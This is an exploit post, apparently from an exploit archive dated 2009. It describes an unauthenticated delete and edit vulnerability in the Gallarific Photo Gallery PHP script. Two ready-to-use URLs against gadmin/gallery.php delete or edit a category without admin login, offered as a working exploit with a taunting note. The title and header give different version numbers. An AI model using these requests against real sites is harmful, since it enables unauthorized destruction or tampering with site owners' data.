Gallarific 1.1 (gallery.php) Arbitrary Delete-Edit Category Vuln

2009-08-12 17:01:12

# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */

side note:
Original Advisory without poC : http://secunia.com/advisories/29399

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.